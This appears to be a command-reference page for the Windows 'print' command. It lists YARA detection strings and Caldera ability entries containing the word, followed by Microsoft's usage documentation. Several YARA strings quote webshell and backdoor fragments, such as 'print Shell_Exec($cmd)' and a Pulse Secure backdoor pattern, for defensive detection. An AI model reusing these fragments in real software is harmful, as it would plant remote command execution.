signature-base | apt_eqgrp_apr17.yar | $s2 = “print "java -jar jscanner.jar$scanth$list\n";” fullword ascii | CC BY-NC 4.0 |
signature-base | apt_eqgrp_apr17.yar | $x1 = “print ‘ -s storebin use storebin as the Store executable\n’” fullword ascii | CC BY-NC 4.0 |
signature-base | apt_eqgrp_apr17.yar | $x3 = “print ‘ -k keyfile the key text file to inject’” fullword ascii | CC BY-NC 4.0 |
signature-base | apt_op_wocao.yar | $a = “out.print("All seems fine.");” | CC BY-NC 4.0 |
signature-base | apt_op_wocao.yar | $e = “out.print((char)c);}in.close()” | CC BY-NC 4.0 |
signature-base | apt_op_wocao.yar | $f = “out.print((char)c);}er.close()” | CC BY-NC 4.0 |
signature-base | apt_project_sauron_extras.yar | $s2 = “Print only replying Ips” | CC BY-NC 4.0 |
signature-base | apt_pulsesecure.yar | $s3 = /if[\x09\x20]{0,32}(CGI::param([\x22\x27]\w{1,64}[\x22\x27]))\s{0,128}{[\x09\x20]{0,32}print [\x22\x27]Cache-Control: no-cache\n[\x22\x27][\x09\x20]{0,32};\s{0,128}print [\x22\x27]Content-type: text\/html\n\n[\x22\x27][\x09\x20]{0,32};\s{0,128}my $\w{1,64}[\x09\x20]{0,32}=[\x09\x20]{0,32}CGI::param([\x22\x27]\w{1,64}[\x22\x27])[\x09\x20]{0,32};\s{0,128}system([\x22\x27]$/ | CC BY-NC 4.0 |
signature-base | apt_pulsesecure.yar | $s4 = /sed -i [^\r\n]{1,128}CGI::param([^\r\n]{1,128}print[\x20\x09]{1,32}[^\r\n]{1,128}Cache-Control: no-cache[^\r\n]{1,128}print[\x20\x09]{1,32}[^\r\n]{1,128}Content-type: text\/html[^\r\n]{1,128}my [^\r\n]{1,128}=[\x09\x20]{0,32}CGI::param([^\r\n]{1,128}system(/ | CC BY-NC 4.0 |
signature-base | apt_pulsesecure.yar | $r3 = /if[\x09\x20]{0,32}($\w{1,64}[\x09\x20]{1,32}eq[\x09\x20]{1,32}[\x22\x27]\w{1,64}[\x22\x27])\s{0,128}{\s{1,128}print[\x09\x20]{0,32}[\x22\x27]Content-type/ | CC BY-NC 4.0 |
signature-base | apt_pulsesecure.yar | $s4 = "print $_" | CC BY-NC 4.0 |
signature-base | apt_pulsesecure.yar | $s6 = "print MIME::Base64::encode(RC4(" | CC BY-NC 4.0 |
signature-base | apt_sandworm_centreon.yar | $pl_socket = "socket(SOCKET, PF_INET, SOCK_STREAM,$tcp) or die print "$l$e$!$l" | CC BY-NC 4.0 |
signature-base | apt_sandworm_centreon.yar | $msg1 = "print "$l OK! I\'m successful connected.$l"" | CC BY-NC 4.0 |
signature-base | apt_sandworm_centreon.yar | $msg2 = "print "$l OK! I\'m accept connection.$l"" | CC BY-NC 4.0 |
signature-base | cn_pentestset_scripts.yar | $s0 = "print "[*] Connected to remote host \n"; " fullword ascii /* PEStudio Blacklist: strings */ | CC BY-NC 4.0 |
signature-base | cn_pentestset_scripts.yar | $s1 = "print "Usage: $0 [Host] [Port] \n\n"; " fullword ascii /* PEStudio Blacklist: strings */ | CC BY-NC 4.0 |
signature-base | cn_pentestset_scripts.yar | $s5 = "print "[*] Resolving HostName\n"; " fullword ascii /* PEStudio Blacklist: strings */ | CC BY-NC 4.0 |
signature-base | exploit_shitrix.yar | $s07 = "template.new({'BLOCK'='print readpipe(" ascii /* TrustedSec templae */ | CC BY-NC 4.0 |
signature-base | gen_cn_webshells.yar | $s3 = "out.print("Hi,Man 2015 ");" fullword ascii | CC BY-NC 4.0 |
signature-base | gen_cn_webshells.yar | $s6 = "out.print("</pre>");" fullword ascii | CC BY-NC 4.0 |
signature-base | gen_cn_webshells.yar | $s7 = "out.print("<pre>");" fullword ascii | CC BY-NC 4.0 |
signature-base | gen_cn_webshells.yar | $s4 = "out.print("Hi,Man 2015");" fullword ascii | CC BY-NC 4.0 |
signature-base | thor-webshells.yar | $s4 = "print "<a href=\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&" | CC BY-NC 4.0 |
signature-base | thor-webshells.yar | $s0 = " out.print("<tr><td width='60%'>"+strCut(convertPath(list[i].getPath()),7" | CC BY-NC 4.0 |
signature-base | thor-webshells.yar | $s0 = "</font><%out.print(request.getRealPath(request.getServletPath())); %>" fullword | CC BY-NC 4.0 |
signature-base | thor-webshells.yar | $s4 = "print "<form action=\"".$me."?p=cmd&dir=".realpath('.')."" | CC BY-NC 4.0 |
signature-base | thor-webshells.yar | $s8 = "print "<td id=f><a href=\"?p=rename&file=".realpath($file)."&di" | CC BY-NC 4.0 |
signature-base | thor-webshells.yar | $s1 = "print "\n".'Tip: to view the file "as is" - open the page in <a href="'.Dx" | CC BY-NC 4.0 |
signature-base | thor-webshells.yar | $s9 = "if(cmd.equals("Szh0ZWFt")){out.print("[S]"+dir+"[E]");}" fullword | CC BY-NC 4.0 |
signature-base | thor-webshells.yar | $s2 = "out.print(") <A Style='Color: " + fcolor.toString() + ";' HRef='?file=" + fn" | CC BY-NC 4.0 |
signature-base | thor-webshells.yar | $s7 = "if(flist[i].canRead() == true) out.print("r" ); else out.print("-");" fullword | CC BY-NC 4.0 |
signature-base | thor-webshells.yar | $s5 = "print "<font face=\"Verdana\" size=\"1\" color=\"#990000\">Filenam" | CC BY-NC 4.0 |
signature-base | thor-webshells.yar | $s8 = "print "<font face=\"Verdana\" size=\"1\" color=\"#990000\">File: </" | CC BY-NC 4.0 |
signature-base | thor-webshells.yar | $s0 = "copy ( $dosya_gonder2, "$dir/$dosya_gonder2_name") ? print("$dosya_gonder2_na" | CC BY-NC 4.0 |
signature-base | thor-webshells.yar | $s2 = "python -c"import md5;x=md5.new('you_password');print x.hexdigest()"" fullword | CC BY-NC 4.0 |
signature-base | thor-webshells.yar | $s0 = "print "\n".'Tip: to view the file "as is" - open the page in <a href="'.Dx" | CC BY-NC 4.0 |
signature-base | thor-webshells.yar | $s1 = "print "Sending mail to $to....... ";" | CC BY-NC 4.0 |
signature-base | thor-webshells.yar | $s2 = "print "Asmodeus Perl Remote Shell" | CC BY-NC 4.0 |
signature-base | thor-webshells.yar | $s2 = "print "\n".'<tr><td width=100pt class=linelisting> | CC BY-NC 4.0 |
signature-base | thor-webshells.yar | $s1 = "print "<tr><td>Server is:</td><td>".$_SERVER['SERVER_SIGNATURE']."</td" | CC BY-NC 4.0 |
signature-base | thor-webshells.yar | $s2 = "print "<tr><td>Execute command:</td><td><input size=100 name=\"_cmd" | CC BY-NC 4.0 |
signature-base | thor-webshells.yar | $s3 = "print "error; help: head -n 16 d00r.py"" fullword | CC BY-NC 4.0 |
signature-base | thor-webshells.yar | $s4 = "print "PW:",PW,"PORT:",PORT,"HOST:",HOST" fullword | CC BY-NC 4.0 |
signature-base | thor-webshells.yar | $s3 = "print "<a href=\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&" | CC BY-NC 4.0 |
signature-base | thor-webshells.yar | $s2 = "print "Set-Cookie: SAVEDPWD=;\n"; # remove password cookie" | CC BY-NC 4.0 |
signature-base | thor-webshells.yar | $s2 = "print(" Provenance du mail : <input type=\"text\" name=\"provenanc" | CC BY-NC 4.0 |
signature-base | thor-webshells.yar | $s3 = "<? if($cmd != "") print Shell_Exec($cmd);?>" fullword | CC BY-NC 4.0 |
signature-base | thor-webshells.yar | $s8 = "print "<form action=\"".$me."?p=chmod&file=".$content."&d" | CC BY-NC 4.0 |
signature-base | thor-webshells.yar | $s18 = "print shell_exec($command);" fullword | CC BY-NC 4.0 |
signature-base | thor-webshells.yar | $s5 = "print " | CC BY-NC 4.0 |
signature-base | thor-webshells.yar | $s7 = "print " | CC BY-NC 4.0 |
signature-base | thor-webshells.yar | $s14 = "print "<tr><td>System type:</td><td>$UName</td></tr>";" fullword | CC BY-NC 4.0 |
signature-base | thor-webshells.yar | $s20 = "print "Transfered $TargetFileSize Bytes. ";" fullword | CC BY-NC 4.0 |
signature-base | thor-webshells.yar | $s12 = "print "Sending mail to $to....... "; " fullword | CC BY-NC 4.0 |
signature-base | thor-webshells.yar | $s4 = "<? if($cmd != "") print Shell_Exec($cmd);?>" fullword | CC BY-NC 4.0 |
signature-base | thor-webshells.yar | $s12 = "print << "[kalabanga]";" fullword | CC BY-NC 4.0 |
signature-base | thor-webshells.yar | $s5 = "print " | CC BY-NC 4.0 |
signature-base | thor-webshells.yar | $s6 = "print "Sorry, none of the command functions works.";" fullword | CC BY-NC 4.0 |
signature-base | thor-webshells.yar | $s3 = "print("<p align=\"center\"><font size=\"5\">Exploit include " | CC BY-NC 4.0 |
stockpile | b007fe0c-c6b0-4fda-915c-255bbc070de2.yml | description: copy the contents for the clipboard and print them | Apache-2.0 |
stockpile | 6c91884e-11ec-422f-a6ed-e76774b0daac.yml | - source: host.print.file | Apache-2.0 |
stockpile | 6c91884e-11ec-422f-a6ed-e76774b0daac.yml | target: host.print.size | Apache-2.0 |
stockpile | 6e1a53c0-7352-4899-be35-fa7f364d5722.yml | name: Print Working Directory | Apache-2.0 |
stockpile | 6e1a53c0-7352-4899-be35-fa7f364d5722.yml | description: Print the current working directory on the system | Apache-2.0 |
stockpile | a41c2324-8c63-4b15-b3c5-84f920d1f226.yml | command: 'find ~ -type f -name #{host.print.file} 2>/dev/null' | Apache-2.0 |
Additional Info*
*The information below is copied from MicrosoftDocs, which is maintained by Microsoft. Available under CC BY 4.0 license.
Sends a text file to a printer. A file can print in the background if you send it to a printer connected to a serial or parallel port on the local computer.
Note: You can perform many configuration tasks from the command prompt by using the Mode command, including configuring a printer connected to a parallel or a serial port, displaying printer status, or preparing a printer for code page switching.
Syntax
print [/d:<printername>] [<drive>:][<path>]<filename>[ ...]
Parameters
Parameter | Description |
---|---|
/d:<printername> | Specifies the printer that you want to print the job to. To print to a locally connected printer, specify the port on your computer where the printer is connected. Valid values for parallel ports are LPT1, LPT2, and LPT3. Valid values for serial ports are COM1, COM2, COM3, and COM4. You can also specify a network printer by using its queue name (\\server_name\printer_name). If you don't specify a printer, the print job is sent to LPT1 by default. |
<drive>: | Specifies the logical or physical drive where the file you want to print is located. This parameter isn't required if the file you want to print is located on the current drive. |
<path> | Specifies the location of the file you want to print. This parameter isn't required if the file you want to print is located in the current directory. |
<filename>[ ...] | Required. Specifies the file you want to print. You can include multiple files in one command. |
/? | Displays help at the command prompt. |
Examples
To send the report.txt file, located in the current directory, to a printer connected to lpt2 on the local computer, type:
print /d:lpt2 report.txt
To send the report.txt file, located in the c:\accounting directory, to the printer1 print queue on the \\copyroom server, type:
print /d:\\copyroom\printer1 c:\accounting\report.txt
Additional References
MIT License. Copyright (c) 2020-2021 Strontic.